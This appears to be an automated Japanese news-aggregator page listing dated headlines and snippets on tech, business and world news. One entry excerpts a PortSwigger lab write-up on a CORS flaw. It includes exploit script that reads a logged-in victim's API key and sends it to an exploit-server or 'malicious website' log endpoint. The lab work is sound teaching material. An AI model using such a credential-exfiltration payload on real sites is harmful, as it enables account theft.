ROBOT |
ロボスタ |
『太陽光発電設備+蓄電池』で災害に強いスマートバス停を実現できるか 新潟県見附駅前・見附高校前で実証実験 |
https://robotstart.info/2022/12/08/smart-bus-niigata-mitsuke.html
|
|
2022-12-08 03:32:58 |
IT |
ITmedia 総合記事一覧 |
[ITmedia News] 「AIの遺電子」アニメ化 元IT記者が描く「AIヒューマノイドと共に生きる近未来」 |
https://www.itmedia.co.jp/news/articles/2212/08/news109.html
|
itmedia |
2022-12-08 12:51:00 |
IT |
ITmedia 総合記事一覧 |
[ITmedia ビジネスオンライン] 人手不足でホテルや旅館が悲鳴! 「稼ぎ時なのに」予約や夕食中止に |
https://www.itmedia.co.jp/business/articles/2212/08/news108.html
|
itmedia |
2022-12-08 12:46:00 |
IT |
ITmedia 総合記事一覧 |
[ITmedia News] Microsoft、ゲーム開発向け支援を拡充 Azureクレジットや法人向けMicrosoft 365を追加で提供 スタートアップ対象 |
https://www.itmedia.co.jp/news/articles/2212/08/news107.html
|
ITmediaNewsMicrosoft、ゲーム開発向け支援を拡充Azureクレジットや法人向けMicrosoftを追加で提供スタートアップ対象米Microsoftがゲーム開発者向けの支援プログラム「IDAzure」を拡充。 |
2022-12-08 12:45:00 |
IT |
ITmedia 総合記事一覧 |
[ITmedia News] 突如終了で批判受けた家族SNS「ウェルノート」、一括ダウンロード提供へ 「みてね」移行も |
https://www.itmedia.co.jp/news/articles/2212/08/news105.html
|
itmedia |
2022-12-08 12:30:00 |
IT |
ITmedia 総合記事一覧 |
[ITmedia ビジネスオンライン] 味やラベルを自由にカスタマイズ サントリーのコーヒーサービス、関西に初出店 特徴は? |
https://www.itmedia.co.jp/business/articles/2212/08/news099.html
|
itmedia |
2022-12-08 12:20:00 |
IT |
ITmedia 総合記事一覧 |
[ITmedia PC USER] ダイヤテック、Bluetooth+USB接続対応メカニカルキーボード「Majestouch Convertible」新モデル Bluetooth 5.1に対応 |
https://www.itmedia.co.jp/pcuser/articles/2212/08/news103.html
|
bluetooth |
2022-12-08 12:20:00 |
TECH |
Techable(テッカブル) |
コストも人権意識も「外部化」をやめよ。なぜ今「ビジネスと人権」なのか |
https://techable.jp/archives/187109
|
論理 |
2022-12-08 03:00:32 |
js |
JavaScriptタグが付けられた新着投稿 - Qiita |
TypeScript文法(基礎編) プリミティブ型、基本的な型の種類について |
https://qiita.com/reisuta/items/702b64d50bbbe6bdf36d
|
typescript |
2022-12-08 12:08:28 |
js |
JavaScriptタグが付けられた新着投稿 - Qiita |
Nuxt/Vueで多階層(入れ子)に対応したアコーディオンを実装する |
https://qiita.com/_neko/items/bc3aaeaaad6b31c61c66
|
httpszenn |
2022-12-08 12:05:50 |
Linux |
Ubuntuタグが付けられた新着投稿 - Qiita |
UbuntuにAWSIM(自動運転シミュレータ)をインストールする |
https://qiita.com/Yujisuper/items/b53a29e2e5949a3a24c7
|
awsim |
2022-12-08 12:52:46 |
Linux |
Ubuntuタグが付けられた新着投稿 - Qiita |
Kubernetesクラスターを構成しているubuntu 20.04のネットワークトラフィックをMRTGでグラフにする |
https://qiita.com/YasuhiroABE/items/7947691d028d5483cf75
|
iplinkw |
2022-12-08 12:52:33 |
golang |
Goタグが付けられた新着投稿 - Qiita |
Go言語でスライスから特定の要素を削除する方法 |
https://qiita.com/isaka1022/items/6dbfa41300f3e47fcc21
|
append |
2022-12-08 12:16:45 |
技術ブログ |
Developers.IO |
[レポート] Amazon Lookout for Equipmentでヘルスケアの異常検知を実現するBreakout Sessionを聴講しました! #reinvent #COM303 |
https://dev.classmethod.jp/articles/reinvent2022-session-com303-monitor-health-using-lookout-equipment/
|
monitorandpred |
2022-12-08 03:58:49 |
技術ブログ |
Developers.IO |
Amazon QuickSight สามารถเขียนโค้ดสร้าง Dashboards, Analyzes และ Templates ได้แล้ว!!! #reInvent |
https://dev.classmethod.jp/articles/quicksight-can-code-to-create-dashboards-analyzes-and-templates/
|
Amazon QuickSight สามารถเขียนโค้ดสร้างDashboards Analyzes และTemplates ได้แล้ว reInventล่าสุดQuickSight ได้มีการอัพเดทใหญ่เกิดขึ้นจากบทความด้านล่างนี้Expanded API capabilities now generally avail |
2022-12-08 03:56:28 |
海外TECH |
DEV Community |
Portswigger’s lab write up: CORS vulnerability with basic origin reflection |
https://dev.to/christianpaez/portswiggers-lab-write-up-cors-vulnerability-with-basic-origin-reflection-2359
|
Portswigger s lab write up CORS vulnerability with basic origin reflectionIn this apprentice level lab we will exploit a website with a basic CORS vulnerability to obtain a user s private credentials Upon logging in with the given credentials we visit the account details page and check the response headers of the request to accountDetails that fetches the user s API key HTTP OKAccess Control Allow Credentials trueContent Type application json charset utf Connection closeContent Length username wiener email apikey JQufLKKzNoIahWKAKWBGePwgwJW sessions cdmflpOOpsYIpnovWUytbSDMiX We can see that the Access Control Allow Credentials true is present let s try to duplicate this request and change the Origin header to something like Origin and see if this value is reflected the resulting response will be something like this HTTP OKAccess Control Allow Origin lt gt Access Control Allow Credentials trueContent Type application json charset utf Connection closeContent Length username wiener email apikey JQufLKKzNoIahWKAKWBGePwgwJW sessions cdmflpOOpsYIpnovWUytbSDMiX The Origin set in the request headers is present in the Access Control Allow Origin response headers this confirms us that this request has a CORS vulnerability let s use the reading material s template to craft our exploit var req new XMLHttpRequest req onload reqListener req open get lt true req withCredentials true req send function reqListener location malicious website com log key encodeURIComponent this responseText We have to modify out exploit to include the vulnerable website s accountDetails endpoint and our exploit server log endpoint after including the code in a lt script gt tag the final exploit will look like this lt script gt var req new XMLHttpRequest req onload reqListener req open get LAB URL accountDetails true req withCredentials true req send function reqListener location EXPLOIT SERVER URL log key encodeURIComponent this responseText lt script gt After sending this exploit to our victim we can read their credentials in our exploit server logs GET log key B A username A wiener C A email A C A apikey A OiwIQxcRilUvyyaitSWuUnzjfrzp C A sessions A B A QJkdqEvVtNcHmZixScfFPDENAzvo C A JNIcVJZlskPdwjcfCfAREYXnaNATt A D A D HTTP User Agent Mozilla Windows NT Win x AppleWebKit KHTML like Gecko Chrome Safari Check out this write up on the Art Of Code Github |
2022-12-08 03:29:08 |
医療系 |
医療介護 CBnews |
病床使用率が上昇傾向、医療機関の集団感染も-厚労省がコロナアドバイザリーボードの分析公表 |
https://www.cbnews.jp/news/entry/20221208122826
|
上昇傾向 |
2022-12-08 12:45:00 |
医療系 |
医療介護 CBnews |
うつ病患者にVR、認知行動療法の臨床研究実施-国立精神・神経医療研究センター病院 |
https://www.cbnews.jp/news/entry/20221207195052
|
国立研究開発法人国立精神 |
2022-12-08 12:10:00 |
海外ニュース |
Japan Times latest articles |
Japan’s smaller contraction masks extent of underlying weakness |
https://www.japantimes.co.jp/news/2022/12/08/business/economy-business/japan-economy-smaller-hit/
|
Japan s smaller contraction masks extent of underlying weaknessGross domestic product shrank an annualized in the three months to the end of September from the previous period revised figures from the Cabinet |
2022-12-08 12:32:19 |
海外ニュース |
Japan Times latest articles |
Japan to describe China military moves as ‘challenge’ to international order |
https://www.japantimes.co.jp/news/2022/12/08/national/japan-document-china-challenge/
|
Japan to describe China military moves as challenge to international orderThe planned reference may provoke Beijing but the wording is softer than threat a term some Liberal Democratic Party lawmakers have backed |
2022-12-08 12:15:29 |
ニュース |
BBC News - Home |
Umar Patek: Anger and fear in Australia as Bali bomber freed |
https://www.bbc.co.uk/news/world-australia-63883431?at_medium=RSS&at_campaign=KARANGA
|
patek |
2022-12-08 03:15:52 |
ニュース |
BBC News - Home |
Why this Trump loyalist is willing to serve months in Rikers prison |
https://www.bbc.co.uk/news/world-us-canada-63893268?at_medium=RSS&at_campaign=KARANGA
|
crimes |
2022-12-08 03:01:32 |
ビジネス |
ダイヤモンド・オンライン - 新着記事 |
TSMCの米半導体工場、後ろ盾は盤石 - WSJ発 |
https://diamond.jp/articles/-/314207
|
盤石 |
2022-12-08 12:22:00 |
ニュース |
Newsweek |
「女子にも権利がある」──11歳で結婚した私が教育を諦めない理由 |
https://www.newsweekjapan.jp/stories/lifestyle/2022/12/11-81.php
|
夫は最初はかたくなだったけど、叔父が私の教育を続けるべきだと家族を説得してくれたことは、とても幸運だった。 |
2022-12-08 12:10:00 |
ニュース |
Newsweek |
ロシア動員兵の間で事故死や変死相次ぐ |
https://www.newsweekjapan.jp/stories/world/2022/12/post-100296.php
|
ウクライナの情報機関であるウクライナ保安庁SBUは月日、ロシア軍の通信を傍受した結果として、ロシア軍司令部が召集兵の死因を隠していることが判明したと発表した。 |
2022-12-08 12:07:30 |
IT |
週刊アスキー |
クリスマスや年末の食卓には「ほっともっと」のチキンバスケット! 「WinterチキンBOXキャンペーン」実施中 |
https://weekly.ascii.jp/elem/000/004/116/4116567/
|
winter |
2022-12-08 12:30:00 |
IT |
週刊アスキー |
15年ぶりの復活「海鮮豆腐キムチチゲ」も登場! 松屋より寒い日にぴったりのピリ辛「牛豆腐キムチチゲ」 |
https://weekly.ascii.jp/elem/000/004/116/4116568/
|
豆腐 |
2022-12-08 12:20:00 |
IT |
週刊アスキー |
バーガーキング「ワッパー チーズ“ウィンター・アラビアータ”」トマトホットソースの辛さとゴーダチーズの舌触りが魅力! |
https://weekly.ascii.jp/elem/000/004/116/4116562/
|
期間限定 |
2022-12-08 12:15:00 |
IT |
週刊アスキー |
1人だけのクリスマスナイトのお供……ロッテリア「Xmas クリぼっちキンパック」12月15日~12月25日発売 |
https://weekly.ascii.jp/elem/000/004/116/4116552/
|
期間限定 |
2022-12-08 12:10:00 |
コメント
コメントを投稿